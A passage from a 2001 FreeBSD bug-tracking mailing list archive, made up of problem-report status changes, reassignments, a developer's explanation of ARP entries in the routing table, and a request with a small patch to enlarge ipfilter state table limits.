majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 11:10:50 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5F08B37B403; Wed, 6 Jun 2001 11:10:49 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56IAdr62613; Wed, 6 Jun 2001 11:10:39 -0700 (PDT) (envelope-from ru) Date: Wed, 6 Jun 2001 11:10:39 -0700 (PDT) From: Message-Id: <200106061810.f56IAdr62613@freefall.freebsd.org> To: sa@kki.org, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/9012: route add -host hostIP -interface localIP doesn't work Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: route add -host hostIP -interface localIP doesn't work State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Wed Jun 6 10:57:55 PDT 2001 State-Changed-Why: It works, that's exactly how ARP entries are stored in the routing table. This command merely emulates actions of the `arp -s hostIP x:x:x:x:x:x' command, i.e., it creates a permanent ARP entry. `route add hostIP/32 -interface ether_addr' will create a "published" (aka proxy) ARP entry for hostIP. This ARP entry can then be immediately announced (this feature is called a gratuitous ARP) if supplied the -proto2 modifier, "arp who-has hostIP tell hostIP" in tcpdump(1) terminology. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=9012 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 11:11:38 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0071737B405; Wed, 6 Jun 2001 11:11:37 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56IBal62799; Wed, 6 Jun 2001 11:11:36 -0700 (PDT) (envelope-from ru) Date: Wed, 6 Jun 2001 11:11:36 -0700 (PDT) From: Message-Id: <200106061811.f56IBal62799@freefall.freebsd.org> To: ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: bin/9012: route add -host hostIP -interface localIP doesn't work Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: route add -host hostIP -interface localIP doesn't work Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: ru Responsible-Changed-When: Wed Jun 6 11:11:20 PDT 2001 Responsible-Changed-Why: Explanations were mine. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=9012 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 12: 0:10 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AB39037B403 for ; Wed, 6 Jun 2001 12:00:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56J04a67038; Wed, 6 Jun 2001 12:00:04 -0700 (PDT) (envelope-from gnats) Received: from wumpus.wlcg.com (wumpus.wlcg.com [209.9.101.248]) by hub.freebsd.org (Postfix) with ESMTP id AFC0237B405 for ; Wed, 6 Jun 2001 11:54:12 -0700 (PDT) (envelope-from rsimmons@wumpus.wlcg.com) Received: (from rsimmons@localhost) by wumpus.wlcg.com (8.11.3/8.11.3) id f56IpVE11245; Wed, 6 Jun 2001 14:51:31 -0400 (EDT) (envelope-from rsimmons) Message-Id: <200106061851.f56IpVE11245@wumpus.wlcg.com> Date: Wed, 6 Jun 2001 14:51:31 -0400 (EDT) From: Rob Simmons Reply-To: rsimmons@wumpus.wlcg.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: kern/27912: ipfilter state table limits are too small Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27912 >Category: kern >Synopsis: ipfilter state table limits are too small >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Jun 06 12:00:04 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Rob Simmons >Release: FreeBSD 4.3-STABLE i386 >Organization: >Environment: System: FreeBSD wumpus 4.3-STABLE FreeBSD 4.3-STABLE #0: Fri May 11 09:42:50 EDT 2001 root@wumpus:/usr/obj/usr/src/sys/WUMPUS i386 >Description: The ipfilter state table limits are too small. Ideally there should be a sysctl knob for changing these limits on the fly. The second most ideal solution is to have a kernel configuration file knob. The last solution which is less than ideal, but would work for most people is to apply the patch supplied below. >How-To-Repeat: The state tables right now have the following values: #define IPSTATE_SIZE 5737 #define IPSTATE_MAX 4013 >Fix: *** /tmp/ip_state.h Wed Jun 6 14:55:56 2001 --- sys/netinet/ip_state.h Wed Jun 6 14:56:21 2001 *************** *** 18,25 **** # define SIOCDELST _IOW(r, 61, struct ipstate *) #endif ! #define IPSTATE_SIZE 5737 ! #define IPSTATE_MAX 4013 /* Maximum number of states held */ #define PAIRS(s1,d1,s2,d2) ((((s1) == (s2)) && ((d1) == (d2))) ||\ (((s1) == (d2)) && ((d1) == (s2)))) --- 18,25 ---- # define SIOCDELST _IOW(r, 61, struct ipstate *) #endif ! #define IPSTATE_SIZE 64747 ! #define IPSTATE_MAX 45322 /* Maximum number of states held */ #define PAIRS(s1,d1,s2,d2) ((((s1) == (s2)) && ((d1) == (d2))) ||\ (((s1) == (d2)) && ((d1) == (s2)))) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 12:33:14 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1053337B401; Wed, 6 Jun 2001 12:33:13 -0700 (PDT) (envelope-from dwmalone@FreeBSD.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56JXCS73425; Wed, 6 Jun 2001 12:33:12 -0700 (PDT) (envelope-from dwmalone) Date: Wed, 6 Jun 2001 12:33:12 -0700 (PDT) From: Message-Id: <200106061933.f56JXCS73425@freefall.freebsd.org> To: dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org, darrenr@FreeBSD.org Subject: Re: kern/27912: ipfilter state table limits are too small Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ipfilter state table limits are too small Responsible-Changed-From-To: freebsd-bugs->darrenr Responsible-Changed-By: dwmalone Responsible-Changed-When: Wed Jun 6 12:32:39 PDT 2001 Responsible-Changed-Why: ipfilter is Darren's. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27912 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:29:40 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5CE9237B406; Wed, 6 Jun 2001 13:29:37 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56KTah81218; Wed, 6 Jun 2001 13:29:36 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:29:36 -0700 (PDT) From: Message-Id: <200106062029.f56KTah81218@freefall.freebsd.org> To: swchui@hutchcity.com, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/17940: Cannot recongize the scsi card AIC-7899 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Cannot recongize the scsi card AIC-7899 State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 13:29:20 PDT 2001 State-Changed-Why: Tough luck... http://www.FreeBSD.org/cgi/query-pr.cgi?pr=17940 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:34:17 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A6F1237B401; Wed, 6 Jun 2001 13:34:15 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56KYFs81556; Wed, 6 Jun 2001 13:34:15 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:34:15 -0700 (PDT) From: Message-Id: <200106062034.f56KYFs81556@freefall.freebsd.org> To: phillip@pm.cse.rmit.edu.au, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/18152: /etc/exports should suggest how to get mountd to reread it Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: /etc/exports should suggest how to get mountd to reread it State-Changed-From-To: analyzed->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 13:33:29 PDT 2001 State-Changed-Why: Our /etc/rc* files look for the existence of /etc/exports, not for the existence of non-comment lines in it. Distributing a default /etc/exports will take som long-haired /etc/rc* work. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=18152 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:37: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E10237B406; Wed, 6 Jun 2001 13:37:05 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Kb5m81851; Wed, 6 Jun 2001 13:37:05 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:37:05 -0700 (PDT) From: Message-Id: <200106062037.f56Kb5m81851@freefall.freebsd.org> To: djm@earth.web.us.uu.net, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/17957: installer navigation is confusing Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: installer navigation is confusing State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 13:36:45 PDT 2001 State-Changed-Why: For the "directors cut" version, see: http://daily.daemonnews.org/view_story.php3?story_id=1954 http://www.FreeBSD.org/cgi/query-pr.cgi?pr=17957 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:37:47 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 740D037B403; Wed, 6 Jun 2001 13:37:45 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56KbjI81974; Wed, 6 Jun 2001 13:37:45 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:37:45 -0700 (PDT) From: Message-Id: <200106062037.f56KbjI81974@freefall.freebsd.org> To: phk@FreeBSD.org, freebsd-bugs@FreeBSD.org, cg@FreeBSD.org Subject: Re: i386/17915: pcm0 direct DMA issues. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: pcm0 direct DMA issues. Responsible-Changed-From-To: freebsd-bugs->cg Responsible-Changed-By: phk Responsible-Changed-When: Wed Jun 6 13:37:27 PDT 2001 Responsible-Changed-Why: Cameron is our sound-geek http://www.FreeBSD.org/cgi/query-pr.cgi?pr=17915 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:39:28 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6C47F37B403; Wed, 6 Jun 2001 13:39:25 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56KdPi82298; Wed, 6 Jun 2001 13:39:25 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:39:25 -0700 (PDT) From: Message-Id: <200106062039.f56KdPi82298@freefall.freebsd.org> To: assar@stacken.kth.se, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/17613: impossible to build FS KLD without kernel source Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: impossible to build FS KLD without kernel source State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 13:39:10 PDT 2001 State-Changed-Why: It is belived that this is not the direction we want to take. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=17613 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:41: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7865337B401; Wed, 6 Jun 2001 13:41:04 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Kf3x82597; Wed, 6 Jun 2001 13:41:03 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:41:03 -0700 (PDT) From: Message-Id: <200106062041.f56Kf3x82597@freefall.freebsd.org> To: Alain.Thivillon@hsc.fr, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/17841: ttyp0 (and only 0!) produces stdout input/output error Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ttyp0 (and only 0!) produces stdout input/output error State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 13:40:39 PDT 2001 State-Changed-Why: I'm pretty sure this is fixed in the 4.3 release. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=17841 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:41:47 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CE7B437B401; Wed, 6 Jun 2001 13:41:45 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Kfjg82728; Wed, 6 Jun 2001 13:41:45 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:41:45 -0700 (PDT) From: Message-Id: <200106062041.f56Kfjg82728@freefall.freebsd.org> To: phk@FreeBSD.org, freebsd-bugs@FreeBSD.org, cg@FreeBSD.org Subject: Re: kern/17688: es_callback() in /sys/pci/es1370.c does not check play_speed Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: es_callback() in /sys/pci/es1370.c does not check play_speed Responsible-Changed-From-To: freebsd-bugs->cg Responsible-Changed-By: phk Responsible-Changed-When: Wed Jun 6 13:41:24 PDT 2001 Responsible-Changed-Why: Sound dude is Cameron... http://www.FreeBSD.org/cgi/query-pr.cgi?pr=17688 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:43:46 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 60B9337B406; Wed, 6 Jun 2001 13:43:45 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Khjh82924; Wed, 6 Jun 2001 13:43:45 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:43:45 -0700 (PDT) From: Message-Id: <200106062043.f56Khjh82924@freefall.freebsd.org> To: adsharma@sharmas.dhs.org, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/16928: dynamic sysctl enhancement Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: dynamic sysctl enhancement State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 13:43:31 PDT 2001 State-Changed-Why: Dynamic sysctl's have been implemented. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=16928 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:45:21 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4696037B403; Wed, 6 Jun 2001 13:45:20 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56KjKj83123; Wed, 6 Jun 2001 13:45:20 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:45:20 -0700 (PDT) From: Message-Id: <200106062045.f56KjKj83123@freefall.freebsd.org> To: phk@FreeBSD.org, freebsd-bugs@FreeBSD.org, bde@FreeBSD.org Subject: Re: kern/16765: Add support for mark/space parity Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Add support for mark/space parity Responsible-Changed-From-To: freebsd-bugs->bde Responsible-Changed-By: phk Responsible-Changed-When: Wed Jun 6 13:44:51 PDT 2001 Responsible-Changed-Why: Bruce, you know the scriptures as far as ttys go, is this the right way to get mark and space parity ? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=16765 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:46:20 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A602C37B403; Wed, 6 Jun 2001 13:46:18 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56KkIR83231; Wed, 6 Jun 2001 13:46:18 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:46:18 -0700 (PDT) From: Message-Id: <200106062046.f56KkIR83231@freefall.freebsd.org> To: kenji.rikitake@acm.org, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/16816: vop_stdpoll() in /sys/kern/vfs_default.c does not handle POLLIN/POLLOUT Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: vop_stdpoll() in /sys/kern/vfs_default.c does not handle POLLIN/POLLOUT State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 13:46:09 PDT 2001 State-Changed-Why: fixed. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=16816 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:47:13 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1940C37B407; Wed, 6 Jun 2001 13:47:10 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Kl9V83466; Wed, 6 Jun 2001 13:47:09 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:47:09 -0700 (PDT) From: Message-Id: <200106062047.f56Kl9V83466@freefall.freebsd.org> To: pfeifer@dbai.tuwien.ac.at, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/16719: /stand/sysinstall does not redraw the screen after - Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: /stand/sysinstall does not redraw the screen after - State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 13:46:32 PDT 2001 State-Changed-Why: Not possible, trust me. Wait for sysinstall-ng. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=16719 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:54: 3 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3F4D137B401; Wed, 6 Jun 2001 13:54:02 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Ks2u84180; Wed, 6 Jun 2001 13:54:02 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:54:02 -0700 (PDT) From: Message-Id: <200106062054.f56Ks2u84180@freefall.freebsd.org> To: dlacroix@streams.com, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/16812: level 0 dump runs forever -- generates a backup much larger than the available disk. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: level 0 dump runs forever -- generates a backup much larger than the available disk. State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 13:53:44 PDT 2001 State-Changed-Why: Sounds like you need a full FSCK and a find to locate sparse files. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=16812 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:54:33 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D123D37B401; Wed, 6 Jun 2001 13:54:31 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56KsV384269; Wed, 6 Jun 2001 13:54:31 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:54:31 -0700 (PDT) From: Message-Id: <200106062054.f56KsV384269@freefall.freebsd.org> To: mikes@silvert.chem.indiana.edu, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/16605: samba 2.0.6 under 3.4-RELEASE can't open buffers Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: samba 2.0.6 under 3.4-RELEASE can't open buffers State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 13:54:23 PDT 2001 State-Changed-Why: timed out. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=16605 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 13:56:34 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2F81F37B403; Wed, 6 Jun 2001 13:56:33 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56KuTa84516; Wed, 6 Jun 2001 13:56:29 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 13:56:29 -0700 (PDT) From: Message-Id: <200106062056.f56KuTa84516@freefall.freebsd.org> To: dirkx@webweaving.org, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/16586: net if down after fail during install Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: net if down after fail during install State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 13:56:19 PDT 2001 State-Changed-Why: timed out http://www.FreeBSD.org/cgi/query-pr.cgi?pr=16586 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14: 0:28 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8404337B406; Wed, 6 Jun 2001 14:00:24 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56L0J385130; Wed, 6 Jun 2001 14:00:19 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 14:00:19 -0700 (PDT) From: Message-Id: <200106062100.f56L0J385130@freefall.freebsd.org> To: sascha@schumann.cx, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/16551: cosmetic cleanup in sys/dev/ppbus/pcfclock.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: cosmetic cleanup in sys/dev/ppbus/pcfclock.c State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 14:00:07 PDT 2001 State-Changed-Why: fixed, thanks! http://www.FreeBSD.org/cgi/query-pr.cgi?pr=16551 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14: 0:28 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C8CE437B409 for ; Wed, 6 Jun 2001 14:00:09 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56L09s85076; Wed, 6 Jun 2001 14:00:09 -0700 (PDT) (envelope-from gnats) Received: from mail.disney.com (mail.disney.com [204.128.192.15]) by hub.freebsd.org (Postfix) with ESMTP id 1A4AE37B408 for ; Wed, 6 Jun 2001 13:59:54 -0700 (PDT) (envelope-from MailHub.Postmaster@disney.com) Received: from pain10.corp.disney.com (root@pain10.corp.disney.com [153.7.110.100]) by mail.disney.com (Switch-2.0.1/Switch-2.0.1) with SMTP id f56KxBA23182 for ; Wed, 6 Jun 2001 13:59:11 -0700 (PDT) Received: from [172.30.50.86] by pain.corp.disney.com with ESMTP for FreeBSD-gnats-submit@freebsd.org; Wed, 6 Jun 2001 14:00:35 -0700 Received: from plio.fan.fa.disney.com (plio.fan.fa.disney.com [153.7.118.2]) by louie.fa.disney.com (8.9.2/8.9.2) with ESMTP id NAA03426 for ; Wed, 6 Jun 2001 13:59:44 -0700 (PDT) (envelope-from root@snoopy.fan.fa.disney.com) Received: from snoopy.fan.fa.disney.com (snoopy.fan.fa.disney.com [172.30.228.110]) by plio.fan.fa.disney.com (8.9.2/8.9.2) with ESMTP id NAA00283 for ; Wed, 6 Jun 2001 13:59:43 -0700 (PDT) (envelope-from root@snoopy.fan.fa.disney.com) 